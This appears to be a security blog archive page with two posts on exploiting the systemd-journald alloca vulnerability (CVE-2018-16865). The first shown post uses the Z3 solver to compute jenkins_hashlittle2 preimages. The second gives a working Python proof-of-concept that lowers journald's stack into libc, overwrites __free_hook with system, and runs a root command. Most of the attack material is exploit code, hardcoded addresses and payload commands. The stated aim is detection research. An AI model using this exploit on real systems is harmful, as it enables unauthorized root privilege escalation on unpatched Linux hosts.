Author Archive

Exploiting systemd-journald Part 2

Posted by

Introduction

This is the second part in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. In the first post, we covered how to communicate with journald, and built a simple proof-of-concept to exploit the vulnerability, using predefined constants for fixed addresses (with ASLR disabled).

In this post, we explore how to compute the hash preimages necessary to write a controlled value into libc’s __free_hook as described in part one. This is an important step in bypassing ASLR, as the address of the target location to which we redirect execution (which is system in our case) will be changing between each instance of systemd-journald. Consequently, successful exploitation in the presence of ASLR requires computing a hash preimage dynamically to correspond with the respective address space of that instance of systemd-journald. How to disclose the location of system, and writing an exploit to completely bypass ASLR, are beyond the scope of this post.

The Challenge

As noted in the first blog post, we don’t directly control the data written to the stack after it has been lowered into libc’s memory – the actual values written are the result of hashing our journal entries with jenkins_hashlittle2. Since this is a function pointer we’re overwriting, we must have full 64 bit control of the hash output which can seem like a very daunting task at first, and would indeed be impractical if a cryptographically secure hash was used. However jenkins_hashlittle2 is not cryptographically secure, and we can use this property to generate preimages for any 64 bit output in just a few seconds.

The Solution

We can use a tool like Z3 to build a mathematical definition of the hash function and automatically generate an input which satisfies certain constraints (like the output being the address of system, and the input being constrained to valid entry format).

Z3

Z3 is a theorem prover which gives us the ability to (among other things) easily model and solve logical constraints. Let’s take a look at how to use it by going through an example in the Z3 repo. In this example, we want to find if there exists an assignment for variables x and y so that the following conditions hold:

  • x + y > 5
  • x > 1
  • y > 1

It is clear that more than one solutions exist to satisfy the above set of constraints. Z3 will inform us if the set constraints has a solution (is satisfiable), as well as provide us with one assignment to our variables that demonstrates satisfiability. Let’s see how Z3 can do so:

from z3 import *

x = Real('x')
y = Real('y')
s = Solver()
s.add(x + y > 5, x > 1, y > 1)
print(s.check())
print(s.model())

This simple example shows how to create variables (e.g. Real('x')), add the constraints that x + y > 5, x > 1, and y > 1 (s.add(x + y > 5, x > 1, y > 1)), check if the given state is satisfiable (i.e. there are values for x and y that satisfy all constraints), and get a set of values for x and y that satisfy the constraints.

As expected, running this example yields:

sat
[y = 4, x = 2]

meaning that the stated formula is satisfiable, and that y=4, x=2 is a solution that satisfies the equation.

BitVectors

Not only can Z3 represent arbitrary real numbers, but it can also represent fixed-width integers called BitVectors. We can use these to model some more interesting elements of low-level computing like integer wraparound:

from z3 import *

x = BitVec('x', 32)  # Create a 32-bit wide variable, x
y = BitVec('y', 32)
s = Solver()
s.add(x > 0, y > 0, x+y < 0)  # Constrain x and y to be positive, but their sum to be negative
print(s.check())
print(s.model())

A few small notes here:

  • Adding two BitVecs of a certain size yields another BitVec of the same size
  • Comparisons made by using < and > in Python result in signed comparisons being added to the solver constraints. Unsigned comparisons can be made using Z3-provided functions.

And as we’d expect,

sat
[b = 2147451006, a = 2147451006]

BitVecs give us a very nice way to represent the primitive C types, such as the ones we will need to model the hash function in order to create our preimages.

Transformations

Being able to solve simple equations is great, but in general we will want to reason on more complex operations involving variables. Z3’s Python bindings allow us to do this in an intuitive way. For instance (drawing from this Wikipedia example), if we wanted to find a fixed point in the equation f(x) = x2-3x+4, we can simply write:

def f(x):
	return x**2 - 3*x + 4

x = Real('x')
s = Solver()
s.add(f(x) == x)
s.check()
s.model()

This yields an expected result:

sat
x = 2

Lastly, it’s worth noting that Z3’s Python bindings provide pretty-printing for expressions. So if we print out f(x) in the above example, we get a nicely formatted representation of what f(x) is symbolically:

x**2 - 3*x + 4

This just scratches the surface of what you can do with Z3, but it’s enough for us to begin using Z3 to model jenkins_hashlittle2, and create preimages for it.

Modeling The Hash Function

Input

As noted above, all BitVectors in Z3 have a fixed size, and this is where we run into our first issue. Our hash function, jenkins_hashlittle2, takes a variable length array of input which can’t be modeled with a fixed length BitVec. So we first need to decide how long our input is going to be.

Looking through the hash function’s source, we see that it chunks its input into 3 uint32_ts at a time, and operates on those. If this is a hash function that uniformly distributes its output, those 12 bytes of input should be enough to cover the 8 byte output space (i.e. all possible 8 byte outputs should be generated by one or more 12 byte input), so we should be able to use 12 bytes as our input length. This also has the benefit of never calling the hash’s internal state mixing function, which greatly reduces the complexity of the equations.

length = 12
target = 0x7ffff7a33440  # The address of system() on our ASLR-disabled system
s = Solver()
key = BitVec('key', 8*length)

Input Constraints

Our input (key) has to satisfy several constraints. Namely, it must be a valid journald native entry. As we saw in part one, this means it should resemble “ENTRY_NAME=ENTRY_VALUE”. However there are some constraints on ENTRY_NAME that we must be taken into account (as checked by the journal_field_valid function): the name must be less than 64 characters, must start with [A-Z], and must only contain [A-Z0-9_]. The ENTRY_VALUE has no constraints besides not containing a newline character, however.

To minimize the total number of constraints Z3 has to solve for, we chose to hard-code the entry format in our model as one uppercase character for the entry name, an equals sign, and then 10 ASCII-printable characters above the control character range for the entry value. To specify this in Z3, we will use the Extract function, which allows us to select slices of a BitVector, such that we can apply constraints to that slice. Extract takes three arguments: bit length, starting offset, and BitVector.

char = Extract(7, 0, key)
s.add(char >= ord('A'), char <= ord('Z'))  # First character must be uppercase

char = Extract(15, 8, key)
s.add(char == ord('='))  # Second character must be ‘=’

for char_offset in range(16, 8*length, 8):
    char = Extract(char_offset + 7, char_offset, key)
    s.add(char >= 0x20, char <= 0x7e)  # Subsequent characters must just be in the printable range

Note: Z3’s Extract function is very un-Pythonic. It takes the high bit first (inclusive), then the low bit (inclusive), then the source BitVec to extract from. So Extract(7, 0, key) extracts the first byte from key.

The Function Itself

Now that we have our input created and constrained, we can model the function itself.

First, we create our Z3 instance of the internal state variables uint32_t a, b, c using the BitVecVal class (which is just a way of creating a BitVec of the specified length with a predetermined value). The predetermined value is the same as in the hashing function, which is the constant 0xdeadbeef plus the length:

initial_vaue = 0xdeadbeef + length
a = BitVecVal(initial_value, 32)
b = BitVecVal(initial_value, 32)
c = BitVecVal(initial_value, 32)

Note: The *pc component of the initialization will always be 0, as it’s initialized to 0 in the hash64() function, which is what’s actually called on our input.

We can ignore the alignment checks the hash function does (as we aren’t actually dereferencing anything in Z3). We can also skip past the while (length > 12) loop, and start in the case 12 as our length is hard-coded to be 12. Thus the first bit of code we need to implement is from inside the switch block on the length, at case 12, which adds the three parts of the key to a, b, and c:

a += Extract(31, 0, key)
b += Extract(63, 32, key)
c += Extract(95, 64, key)

Since key is just an vector of bits from the perspective of Z3, in the above code we just Extract the first, second, and third uint32_t – there’s no typecasting to do.

Following the C source, we next need to implement the final macro, which does the final state mixing to produce the hash output. Looking at the source, it uses another macro (rot), but this is just a simple rotate left operation. Z3 has rotate left as a primitive function, so we can make our lives easy by adding an import to our Python:

from z3 import RotateLeft as rot

And then we can simply paste in the macro definition verbatim (well, minus the line-continuation characters):

c ^= b; c -= rot(b, 14)
a ^= c; a -= rot(c, 11)
b ^= a; b -= rot(a, 25)
c ^= b; c -= rot(b, 16)
a ^= c; a -= rot(c, 4)
b ^= a; b -= rot(a, 14)
c ^= b; c -= rot(b, 24)

At this point, the variables a, b, and c contain equations which represent their state when the hash function is about to return. From the source, hash64() combines the b and c out arguments to produce the final 64-bit hash. So we can simply add constraints to our model to denote that b and c are equal to their respective halves of the 64-bit output we want:

s.add(b == (target & 0xffffffff))
s.add(c == (target >> 32))

All that’s left at this point is to check the state for satisfiability:

s.check()

Get our actual preimage value from the model:

preimage = s.model()[key].as_long()

And transform it into a string:

input_str = preimage.to_bytes(12, byteorder='little').decode('ascii')

With that, our exploit from part 1 is now fully explained, and can be used on any system where the addresses of libc and the stack are constant (i.e. systems which have ASLR disabled).

Conclusion

Z3 is a very powerful toolkit that can be used to solve a number of problems in exploit development. This blog post has only scratched the surface of its capabilities, but as we’ve seen, even basic Z3 operations can be used to trivially solve complex problems.

Read Part One of this series

Recent Posts

Exploiting systemd-journald Part 1

Posted by

Introduction

This is part one in a multipart series (read Part 2 here) on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were:

  • a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865)
  • a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866)

The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow for user-generated log data to manipulate memory such that they can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allow for privilege escalation to root on the target system.

As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community.

As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions).

As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication’s analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture which we assume for this post is Ubuntu x86_64, and so to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image.

Proof-of-Concept

Attack Vector

Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project’s own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don’t provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch.

To dive deeper into how our exploit works, we need to first understand how journald clients communicate to the daemon. So let’s get started!

Interacting with systemd-journald

There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald’s service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journald/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside.

Syslog Interface

The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren’t built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. added by syslog, see manpage syslog(3)) and then saved.

A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl.

$ echo 'Test Message!' | nc -Uu /dev/log
$ journalctl --user -n 1
...
Jan 23 17:23:47 localhost nc[3646]: Test Message!

Journald-Native Interface

The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed by the UNIX datagram socket at /run/systemd/journal/socket.The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple Key/Value store, and which allows clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a uint64, the contents of the blob, and a final newline like so:

SOME_KEY
\x0a\x00\x00\x00\x00\x00\x00\x00\x00SOME_VALUE

The native socket can also accept these entries in two different ways:

  • by directly sending data over the socket
  • by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket

Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes in to play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald’s self-imposed 768MB limit (defined by DATA_SIZE_MAX).

Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors:

  • normal file descriptors (see manpages fcntl(2))
  • sealed memfds (see manpages memfd_create(2))

Luckily, we don’t need to bother with sealed file descriptors for reasons that we’ll get to in a future post.

Similarly to the syscall interface, you can easily send native messages with nc:

$ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1
...
Jan 23 17:39:40 localhost nc[7154]: Hello!

And to add custom entries:

$ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1 -o json-pretty
{
        "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8
        "__REALTIME_TIMESTAMP" : "1548283220714394",
        "__MONOTONIC_TIMESTAMP" : "95417780424",
...
        "MESSAGE" : "Hello!",
        "KEY" : "VALUE",
...
}

Exploitation

Overview

Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don’t have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865.

As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions of entries. When these entries are appended to the journal, these messages result in a size of roughly sizeof(EntryItem) * n_entries to be allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. The actual use of alloca() in the source is wrapped in a macro called newa(), and the responsible code for the vulnerable operation looks like:

items = newa(EntryItem, MAX(1u, n_iovec));

Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control.

To actually exploit this, there are two main issues we need to solve:

  • Sending all of the entries to journald
  • Controlling the data written to the stack after it has been lowered into libc

The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc.

The second issue is a bit more complex, since we don’t directly control the data written to the stack after it has been lowered into libc’s memory. This is because our entries are being hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name).

Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which presents a seemingly formidable problem at first. Preimaging a hash can be a daunting task; however, there are some very nice tools we can use to calculate exact preimages in under 30 seconds, since this is not a cryptographically secure hash. We’ll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image.

Proof-of-Concept Code

Here we will begin walking through Python code for our PoC, and a link to the full script can be found at the very end.

The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line:

#!/usr/bin/env python3
import array
import os
import socket
import struct

TEMPFILE = '/tmp/systemdown_temp'

def p64(n):
    return struct.pack('<Q', n)

class UNIXSocket(object):
    def __init__(self, path):
        self.path = path

    def __enter__(self):
        self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)
        self.client.connect(self.path)
        return self.client

    def __exit__(self, exc_t, exc_v, traceback):
        self.client.close()

Next we have some constants that may change based on the particular target environment. These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled):

# Non-ASLR fixed locations for our test image

libc = 0x7ffff79e4000
stack = 0x7fffffffde60

#location of the free_hook function pointer to overwrite
free_hook = libc + 0x3ed8e8

# preimage which computes to location of the system function via hash64()
# that location is libc + 0x4f440 in our test image
system_preimage = b"Y=J~-Y',Wj(A" 

# padding count to align memory
padding_kvs = 3

Now we have the bulk of the values needed for our proof-of-concept exploit.

The first step in the exploit logic is to add some padding entries which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data
(and the functions it calls) further down. This is to align the precise location where data will be written in libc’s .BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation.

with open(TEMPFILE, 'wb') as log:
    msg = b""
    for _ in range(padding_kvs):
        msg += b"P=\n"

Next, we add the preimage value, the hash for which (when computed from hash64()) will be the address of system. Specifically, this alignment of this value will be such that journald writes system into libc’s __free_hook, giving us a shell when our command below is freed.

   # msg n is our key that when hashed gives system
    msg += system_preimage + b"\n"

Next, we append our command as a binary data block surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns:

# next is our command as a binary data block
    cmd = b"echo $(whoami) > /tmp/pwn"
    # be sure to kill journald afterwards so it doesn't lockup
    cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;"
    # format as a binary data block
    msg += b"C\n"
    msg += p64(len(cmd))
    msg += cmd + b"\n"

As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corrupting of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack.

 # Then we send a large item which breaks the loop
    msg += b"A=" + b"B"*(128*1024*1024) + b"\n"

Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place:

 # Then fill with as many KVs as we need to get to the right addr
    num_msgs = (((stack - free_hook)//16) - 1)
    num_msgs -= 3  # the three above
    num_msgs -= 7  # added by journald itself

    msg += b"B=\n" * num_msgs

    log.write(msg)

At this point, we just need to pass the log FD to journald to get our shell:

with UNIXSocket("/run/systemd/journal/socket") as sock:
    with open(TEMPFILE, 'rb') as log:
        sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [log.fileno()]))])

os.unlink(TEMPFILE)

After running this, we find the file /tmp/pwn has been created with contents “root”, meaning we have successfully achieved our privilege escalation.

$ cat /tmp/pwn
root

All Together Now

The full proof-of-concept script that works with ASLR disabled is available here.

Detection

Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities, and when necessary, improve them. Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot Strategy (we call our detection models strategies), and would generally detect most payloads.  With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do this all by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn’t a good model for detection and prevention.

Read next: Part 2 of Exploiting systemd-journald

Recent Posts